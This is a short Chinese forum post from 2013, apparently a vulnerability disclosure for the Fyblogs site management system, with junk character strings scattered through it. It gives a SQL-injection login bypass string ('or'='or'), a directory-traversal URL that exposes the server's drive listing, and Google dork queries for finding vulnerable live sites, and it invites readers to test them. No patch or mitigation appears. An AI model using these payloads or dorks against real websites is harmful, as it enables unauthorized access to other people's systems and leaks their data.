漏洞类型: 未授权访问/权限绕过
6 z9 i' ?& C6 Q5 p$ H4 `! V8 ^$ m- U2 W* t( I9 }+ p2 ]# x- D1 _
简要描述:* k0 V. ^! [, N6 O" J: A+ j( O
; R: l4 L8 g1 ?
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
- s N; l/ o; |2 n& [7 t q" r3 t
6 _2 B) J, p3 ]5 u8 W% G1 H4 S详细说明:
8 m/ f9 }' {( d7 |* D% S6 f2 {! F( R) O2 b: P$ j, v% P; w
后台万能密码 'or'='or'
; T, r/ F9 B' s5 g; @8 F后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
7 B4 b2 l% c% t* \admin/uploadfile.asp?currentFolder=/upfiles/../3 w& w: S' e k% `- B: M& ]
7 d& T2 c3 X% d1 E+ l+ N
漏洞证明:
$ o }+ i2 F0 j$ O9 ]! d
* v Q! i2 O9 e谷歌:inurl:type.asp?id=1 新闻中心
* C( F; T8 u' `% a) w S或者 :inurl:download_ok.asp?
3 }+ @$ g) E$ |8 q9 b" H' n2 B0 T0 j. I2 z1 l) U8 N
可以测试
2 F, A: C# i( e) O1 g; V7 A: F- G
0 b( g* q F, i6 _# d
|
发表于 2013-3-7 13:07:46
收藏
支持
反对